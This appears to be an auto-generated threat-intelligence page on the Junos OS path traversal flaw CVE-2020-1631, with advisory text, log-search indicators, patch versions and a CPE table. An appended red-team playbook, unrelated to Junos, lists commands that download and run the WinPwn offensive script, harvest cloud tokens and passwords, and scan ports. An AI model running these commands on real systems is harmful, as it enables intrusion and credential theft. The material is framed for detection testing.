CVE-2020-1631
Overview
This vulnerability is a local file inclusion (LFI) and path traversal flaw in the HTTP/HTTPS service of Juniper Networks Junos OS, specifically affecting components such as J-Web, Web Authentication, Dynamic-VPN, Firewall Authentication Pass-Through with Web-Redirect, and Zero Touch Provisioning. The root cause lies in improper input validation allowing unauthenticated attackers to manipulate file paths and inject commands into the httpd log files. The affected service runs with limited privileges under the 'nobody' user account on Junos OS devices with HTTP/HTTPS enabled.
Vulnerability Description
A vulnerability in the HTTP/HTTPS service used by J-Web, Web Authentication, Dynamic-VPN (DVPN), Firewall Authentication Pass-Through with Web-Redirect, and Zero Touch Provisioning (ZTP) allows an unauthenticated attacker to perform local file inclusion (LFI) or path traversal. Using this vulnerability, an attacker may be able to inject commands into the httpd.log, read files with 'world' readable permission file or obtain J-Web session tokens. In the case of command injection, as the HTTP service runs as user 'nobody', the impact of this command injection is limited. (CVSS score 5.3, vector CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:L/I:N/A:N) In the case of reading files with 'world' readable permission, in Junos OS 19.3R1 and above, the unauthenticated attacker would be able to read the configuration file. (CVSS score 5.9, vector CVSS:3.1/ AV:N/AC:H/PR:N/UI:N/S:U/C:H/I:N/A:N) If J-Web is enabled, the attacker could gain the same level of access of anyone actively logged into J-Web. If an administrator is logged in, the attacker could gain administrator access to J-Web. (CVSS score 8.8, vector CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:U/C:H/I:H/A:H) This issue only affects Juniper Networks Junos OS devices with HTTP/HTTPS services enabled. Junos OS devices with HTTP/HTTPS services disabled are not affected. If HTTP/HTTPS services are enabled, the following command will show the httpd processes: user@device> show system processes | match http 5260 - S 0:00.13 /usr/sbin/httpd-gk -N 5797 - I 0:00.10 /usr/sbin/httpd --config /jail/var/etc/httpd.conf To summarize: If HTTP/HTTPS services are disabled, there is no impact from this vulnerability. If HTTP/HTTPS services are enabled and J-Web is not in use, this vulnerability has a CVSS score of 5.9 (CVSS:3.1/AV:N/AC:H/PR:N/UI:N/S:U/C:H/I:N/A:N). If J-Web is enabled, this vulnerability has a CVSS score of 8.8 (CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:U/C:H/I:H/A:H). Juniper SIRT has received a single report of this vulnerability being exploited in the wild. Out of an abundance of caution, we are notifying customers so they can take appropriate actions. Indicators of Compromise: The /var/log/httpd.log may have indicators that commands have injected or files being accessed. The device administrator can look for these indicators by searching for the string patterns "=*;*&" or "*%3b*&" in /var/log/httpd.log, using the following command: user@device> show log httpd.log | match "=*;*&|=*%3b*&" If this command returns any output, it might be an indication of malicious attempts or simply scanning activities. Rotated logs should also be reviewed, using the following command: user@device> show log httpd.log.0.gz | match "=*;*&|=*%3b*&" user@device> show log httpd.log.1.gz | match "=*;*&|=*%3b*&" Note that a skilled attacker would likely remove these entries from the local log file, thus effectively eliminating any reliable signature that the device had been attacked. This issue affects Juniper Networks Junos OS 12.3 versions prior to 12.3R12-S16; 12.3X48 versions prior to 12.3X48-D101, 12.3X48-D105; 14.1X53 versions prior to 14.1X53-D54; 15.1 versions prior to 15.1R7-S7; 15.1X49 versions prior to 15.1X49-D211, 15.1X49-D220; 16.1 versions prior to 16.1R7-S8; 17.2 versions prior to 17.2R3-S4; 17.3 versions prior to 17.3R3-S8; 17.4 versions prior to 17.4R2-S11, 17.4R3-S2; 18.1 versions prior to 18.1R3-S10; 18.2 versions prior to 18.2R2-S7, 18.2R3-S4; 18.3 versions prior to 18.3R2-S4, 18.3R3-S2; 18.4 versions prior to 18.4R1-S7, 18.4R3-S2 ; 18.4 version 18.4R2 and later versions; 19.1 versions prior to 19.1R1-S5, 19.1R3-S1; 19.1 version 19.1R2 and later versions; 19.2 versions prior to 19.2R2; 19.3 versions prior to 19.3R2-S3, 19.3R3; 19.4 versions prior to 19.4R1-S2, 19.4R2; 20.1 versions prior to 20.1R1-S1, 20.1R2.
Impact
An unauthenticated attacker can exploit this vulnerability to read sensitive files, including device configuration files, or inject commands into log files. If J-Web is enabled and an administrator is actively logged in, the attacker can escalate privileges to gain full administrative access to J-Web, effectively compromising device management. No authentication or user interaction is required to exploit the path traversal or file reading aspects, while limited user interaction is needed for full administrative access via J-Web. This can lead to unauthorized disclosure of sensitive network configuration and potential control over the device management interface.
Solution
Juniper Networks has released security advisories addressing this vulnerability under JSA11021. Users should upgrade affected Junos OS devices to fixed versions, including but not limited to 12.3R12-S16, 14.1X53-D54, 15.1R7-S7, 16.1R7-S8, 17.2R3-S4, 18.1R3-S10, 19.3R2-S3, and 20.1R2 or later as specified in the advisory. Devices with HTTP/HTTPS services disabled are not affected. Detailed patch instructions and version-specific fixes are available at https://kb.juniper.net/JSA11021.
EPSS vs KEV Prediction — Evolution (30 days)
Full Analysis
The vulnerability in the HTTP/HTTPS service utilized by Juniper Networks' J-Web, Web Authentication, Dynamic-VPN, Firewall Authentication Pass-Through with Web-Redirect, and Zero Touch Provisioning presents significant security risks. This flaw allows unauthenticated attackers to execute local file inclusion (LFI) or path traversal attacks. By exploiting this vulnerability, an attacker can manipulate the HTTP service to inject commands into the httpd.log file, access files with world-readable permissions, or even obtain session tokens from J-Web. The HTTP service operates under the user 'nobody', which limits the impact of command injection; however, the ability to read sensitive configuration files poses a serious threat, especially in versions of Junos OS 19.3R1 and above.
Attack vectors for this vulnerability are diverse and can be executed remotely without authentication. An attacker could leverage the vulnerability to gain unauthorized access to sensitive information or escalate privileges if an administrator is logged into J-Web. For instance, if the attacker successfully accesses the J-Web session tokens, they could impersonate an administrator and gain full control over the affected device. The exploitation of this vulnerability could lead to unauthorized configuration changes, data breaches, or even service disruptions, making it a critical concern for organizations relying on Juniper Networks' devices.
The real-world impact of this vulnerability can be substantial, particularly for organizations that utilize Juniper's networking equipment in their infrastructure. The potential for unauthorized access to configuration files can lead to exposure of sensitive data, including network configurations and security policies. Additionally, if an attacker gains administrative access, they could manipulate network settings, leading to further vulnerabilities or service outages. The financial and reputational damage resulting from such incidents can be severe, making it imperative for organizations to prioritize the mitigation of this risk.
To detect and mitigate this vulnerability, organizations should first assess whether HTTP/HTTPS services are enabled on their Junos OS devices. Disabling these services is the most effective way to eliminate the risk. For those that require these services, regular monitoring of the httpd.log for suspicious entries, such as command injection patterns, is essential. Administrators should utilize commands to search for indicators of compromise and review rotated logs to identify any malicious activities. Furthermore, applying the latest security patches and updates from Juniper Networks is crucial to ensure that devices are protected against known vulnerabilities.
In summary, the vulnerability in Juniper Networks' HTTP/HTTPS service represents a significant threat to network security. The ability for unauthenticated attackers to exploit this flaw emphasizes the need for robust security practices, including disabling unnecessary services, monitoring logs for suspicious activity, and ensuring timely updates. Organizations must remain vigilant and proactive in their cybersecurity strategies to safeguard their networks against potential exploitation.
CSURFACE threat intelligence has detected a marked escalation in activity related to CVE-2020-1631, with our telemetry indicating the first confirmed sighting of exploitation attempts targeting this vulnerability. Concurrently, the CVSS score has been revised downward from 9.8 to 8.8, reflecting updated assessments of exploitability and impact. This shift underscores a nuanced understanding of the vulnerability’s risk profile, balancing the increased detection of exploitation attempts against a recalibrated severity rating. For defenders, the emergence of exploitation activity signals that threat actors are actively probing or leveraging this flaw, elevating the urgency for monitoring and response despite the slightly reduced CVSS score. The current exploit landscape remains without new publicly disclosed exploit techniques, but the uptick in observed activity suggests that adversaries may be refining or deploying existing methods. Overall, this development elevates the operational risk associated with CVE-2020-1631, warranting heightened vigilance in environments running affected Junos OS versions.
Update 2 — June 23, 2026
CSURFACE threat intelligence has detected a marked escalation in activity related to CVE-2020-1631, with our telemetry indicating a doubling in detection frequency over recent monitoring periods. Although the EPSS score has slightly declined, this decrease does not correlate with reduced adversary interest; instead, the surge in observed probing and potential exploitation attempts suggests threat actors are intensifying efforts to leverage this vulnerability. The absence of new publicly disclosed exploits implies that attackers may be refining existing techniques rather than deploying novel methods. This heightened activity elevates the operational risk for organizations running vulnerable Junos OS versions, underscoring the necessity for enhanced monitoring and rapid incident response capabilities to address potential local file inclusion or command injection attempts.
Affected Products (277)
| Vendor | Product | Version | CPE | |
|---|---|---|---|---|
|
|
Juniper | Junos | 12.3 |
cpe:2.3:o:juniper:junos:12.3:-:*:*:*:*:*:*
|
|
|
Juniper | Junos | 12.3 |
cpe:2.3:o:juniper:junos:12.3:r1:*:*:*:*:*:*
|
|
|
Juniper | Junos | 12.3 |
cpe:2.3:o:juniper:junos:12.3:r10:*:*:*:*:*:*
|
|
|
Juniper | Junos | 12.3 |
cpe:2.3:o:juniper:junos:12.3:r10-s1:*:*:*:*:*:*
|
|
|
Juniper | Junos | 12.3 |
cpe:2.3:o:juniper:junos:12.3:r10-s2:*:*:*:*:*:*
|
|
|
Juniper | Junos | 12.3 |
cpe:2.3:o:juniper:junos:12.3:r11:*:*:*:*:*:*
|
|
|
Juniper | Junos | 12.3 |
cpe:2.3:o:juniper:junos:12.3:r12:*:*:*:*:*:*
|
|
|
Juniper | Junos | 12.3 |
cpe:2.3:o:juniper:junos:12.3:r12-s1:*:*:*:*:*:*
|
|
|
Juniper | Junos | 12.3 |
cpe:2.3:o:juniper:junos:12.3:r12-s11:*:*:*:*:*:*
|
|
|
Juniper | Junos | 12.3 |
cpe:2.3:o:juniper:junos:12.3:r12-s12:*:*:*:*:*:*
|
|
|
Juniper | Junos | 12.3 |
cpe:2.3:o:juniper:junos:12.3:r12-s13:*:*:*:*:*:*
|
|
|
Juniper | Junos | 12.3 |
cpe:2.3:o:juniper:junos:12.3:r12-s14:*:*:*:*:*:*
|
|
|
Juniper | Junos | 12.3 |
cpe:2.3:o:juniper:junos:12.3:r12-s15:*:*:*:*:*:*
|
|
|
Juniper | Junos | 12.3 |
cpe:2.3:o:juniper:junos:12.3:r12-s3:*:*:*:*:*:*
|
|
|
Juniper | Junos | 12.3 |
cpe:2.3:o:juniper:junos:12.3:r12-s4:*:*:*:*:*:*
|
|
|
Juniper | Junos | 12.3 |
cpe:2.3:o:juniper:junos:12.3:r12-s6:*:*:*:*:*:*
|
|
|
Juniper | Junos | 12.3 |
cpe:2.3:o:juniper:junos:12.3:r12-s8:*:*:*:*:*:*
|
|
|
Juniper | Junos | 12.3x48 |
cpe:2.3:o:juniper:junos:12.3x48:-:*:*:*:*:*:*
|
|
|
Juniper | Junos | 12.3x48 |
cpe:2.3:o:juniper:junos:12.3x48:d10:*:*:*:*:*:*
|
|
|
Juniper | Junos | 12.3x48 |
cpe:2.3:o:juniper:junos:12.3x48:d100:*:*:*:*:*:*
|
Exploits
No exploits found for this CVE.
Threat Feed
4 eventsSighting activity recorded
Sighting activity recorded
Sighting activity recorded
CISA confirmed active exploitation — added to Known Exploited Vulnerabilities catalog
Likely Kill Chain
Typical exploitation path inferred from this vulnerability's characteristics — mapped to MITRE ATT&CK tactics.
Kill chain derived from the ML classifier.
Attack Vectors ML
MITRE ATT&CK Techniques (6)
The adversary's likely kill chain after exploiting this CVE — in execution order. Validate each stage with the Red Team Playbook below.
The techniques for this CVE don't apply to this operating system. Switch OS above.
CAPEC Attack Patterns ML
Red Team Playbook
33 AtomicRedTeam test(s) mapped to this CVE's kill chain. Use them to validate detections and controls.
AtomicRedTeam has no published tests for this CVE's techniques on this OS. Switch OS above to see other options.
Set-PowerCLIConfiguration -InvalidCertificateAction Ignore -ParticipateInCEIP:$false -Confirm:$false
Connect-VIServer -Server #{vm_host} -User #{vm_user} -Password #{vm_pass}
Get-VMHostService -VMHost #{vm_host} | Where-Object {$_.Key -eq "TSM-SSH" } | Start-VMHostService -Confirm:$false
echo "" | "#{plink_file}" -batch "#{vm_host}" -ssh -l #{vm_user} -pw "#{vm_pass}" "vim-cmd hostsvc/enable_ssh"
docker build -t t1046 $PathToAtomicsFolder/T1046/src/
docker run --name t1046_container --rm -d -t t1046
docker exec t1046_container /scan.sh
for port in {1..65535}; do (2>/dev/null echo >/dev/tcp/#{host}/$port) && echo port $port is open ; done
nmap #{host_to_scan}
sudo nmap -sS #{network_range} -p #{port}
telnet #{host} #{port}
nc -nv #{host} #{port}
nmap -Pn -sV -p #{port_range} #{host}
python "#{filename}" -i #{host_ip}
$ipAddr = "#{ip_address}"
if ($ipAddr -like "*,*") {
$ip_list = $ipAddr -split ","
$ip_list = $ip_list.ForEach({ $_.Trim() })
Write-Host "[i] IP Address List: $ip_list"
$ports = #{port_list}
foreach ($ip in $ip_list) {
foreach ($port in $ports) {
Write-Host "[i] Establishing connection to: $ip : $port"
try {
$tcp = New-Object Net.Sockets.TcpClient
$tcp.ConnectAsync($ip, $port).Wait(#{timeout_ms}) | Out-Null
} catch {}
if ($tcp.Connected) {
$tcp.Close()
Write-Host "Port $port is open on $ip"
}
}
}
} elseif ($ipAddr -notlike "*,*") {
if ($ipAddr -eq "") {
# Assumes the "primary" interface is shown at the top
$interface = Get-NetIPInterface -AddressFamily IPv4 -ConnectionState Connected | Select-Object -ExpandProperty InterfaceAlias -First 1
Write-Host "[i] Using Interface $interface"
$ipAddr = Get-NetIPAddress -AddressFamily IPv4 -InterfaceAlias $interface | Select-Object -ExpandProperty IPAddress
}
Write-Host "[i] Base IP-Address for Subnet: $ipAddr"
$subnetSubstring = $ipAddr.Substring(0, $ipAddr.LastIndexOf('.') + 1)
# Always assumes /24 subnet
Write-Host "[i] Assuming /24 subnet. scanning $subnetSubstring'1' to $subnetSubstring'254'"
$ports = #{port_list}
$subnetIPs = 1..254 | ForEach-Object { "$subnetSubstring$_" }
foreach ($ip in $subnetIPs) {
foreach ($port in $ports) {
try {
$tcp = New-Object Net.Sockets.TcpClient
$tcp.ConnectAsync($ip, $port).Wait(#{timeout_ms}) | Out-Null
} catch {}
if ($tcp.Connected) {
$tcp.Close()
Write-Host "Port $port is open on $ip"
}
}
}
} else {
Write-Host "[Error] Invalid Inputs"
exit 1
}
Get-Service -Name "Remote Desktop Services", "Remote Desktop Configuration"
iex(new-object net.webclient).downloadstring('https://raw.githubusercontent.com/S3cur3Th1sSh1t/WinPwn/121dcee26a7aca368821563cbe92b2b5638c5773/WinPwn.ps1')
MS17-10 -noninteractive -consoleoutput
iex(new-object net.webclient).downloadstring('https://raw.githubusercontent.com/S3cur3Th1sSh1t/WinPwn/121dcee26a7aca368821563cbe92b2b5638c5773/WinPwn.ps1')
bluekeep -noninteractive -consoleoutput
iex(new-object net.webclient).downloadstring('https://raw.githubusercontent.com/S3cur3Th1sSh1t/WinPwn/121dcee26a7aca368821563cbe92b2b5638c5773/WinPwn.ps1')
fruit -noninteractive -consoleoutput
iex(new-object net.webclient).downloadstring('https://raw.githubusercontent.com/S3cur3Th1sSh1t/WinPwn/121dcee26a7aca368821563cbe92b2b5638c5773/WinPwn.ps1')
spoolvulnscan -noninteractive -consoleoutput
Start-Process -FilePath "#{autoit_path}" -ArgumentList "#{script_path}"
echo "Creating %systemroot%\wpbbin.exe"
New-Item -ItemType File -Path "$env:SystemRoot\System32\wpbbin.exe"
type C:\Windows\Panther\unattend.xml
type C:\Windows\Panther\Unattend\unattend.xml
python2 laZagne.py all
grep -ri password #{file_path}
exit 0
findstr /si pass *.xml *.doc *.txt *.xls
ls -R | select-string -ErrorAction SilentlyContinue -Pattern password
find #{file_path}/.aws -name "credentials" -type f 2>/dev/null
find #{file_path}/.azure -name "msal_token_cache.json" -o -name "accessTokens.json" -type f 2>/dev/null
find #{file_path}/.config/gcloud -name "credentials.db" -o -name "access_tokens.db" -type f 2>/dev/null
find #{file_path}/.oci/sessions -name "token" -type f 2>/dev/null
for file in $(find #{file_path} -type f -name .netrc 2> /dev/null);do echo $file ; cat $file ; done
dir /a:h C:\Users\%USERNAME%\AppData\Local\Microsoft\Credentials\
dir /a:h C:\Users\%USERNAME%\AppData\Roaming\Microsoft\Credentials\
$usernameinfo = (Get-ChildItem Env:USERNAME).Value
Get-ChildItem -Hidden C:\Users\$usernameinfo\AppData\Roaming\Microsoft\Credentials\
Get-ChildItem -Hidden C:\Users\$usernameinfo\AppData\Local\Microsoft\Credentials\
iex(new-object net.webclient).downloadstring('https://raw.githubusercontent.com/S3cur3Th1sSh1t/WinPwn/121dcee26a7aca368821563cbe92b2b5638c5773/WinPwn.ps1')
SharpCloud -consoleoutput -noninteractive
iex(new-object net.webclient).downloadstring('https://raw.githubusercontent.com/S3cur3Th1sSh1t/WinPwn/121dcee26a7aca368821563cbe92b2b5638c5773/WinPwn.ps1')
sessionGopher -noninteractive -consoleoutput
iex(new-object net.webclient).downloadstring('https://raw.githubusercontent.com/S3cur3Th1sSh1t/WinPwn/121dcee26a7aca368821563cbe92b2b5638c5773/WinPwn.ps1')
Snaffler -noninteractive -consoleoutput
iex(new-object net.webclient).downloadstring('https://raw.githubusercontent.com/S3cur3Th1sSh1t/WinPwn/121dcee26a7aca368821563cbe92b2b5638c5773/WinPwn.ps1')
passhunt -local $true -noninteractive
iex(new-object net.webclient).downloadstring('https://raw.githubusercontent.com/S3cur3Th1sSh1t/WinPwn/121dcee26a7aca368821563cbe92b2b5638c5773/WinPwn.ps1')
powershellsensitive -consoleoutput -noninteractive
iex(new-object net.webclient).downloadstring('https://raw.githubusercontent.com/S3cur3Th1sSh1t/WinPwn/121dcee26a7aca368821563cbe92b2b5638c5773/WinPwn.ps1')
sensitivefiles -noninteractive -consoleoutput
Detection & Response Rules
No detection or response rules found for this CVE.
No news articles found for this CVE.
References (3)
| Title | Tags | URL |
|---|---|---|
| nvd.nist.gov |
NVD
reference
|
https://nvd.nist.gov/vuln/detail/CVE-2020-1631 |
| kb.juniper.net |
GitHub CVE
x_refsource_CONFIRM
|
https://kb.juniper.net/JSA11021 |
| cisa.gov |
NVD API
US Government Resource
|
https://www.cisa.gov/known-exploited-vulnerabilities-catalog?field_cve=CVE-2020-1631 |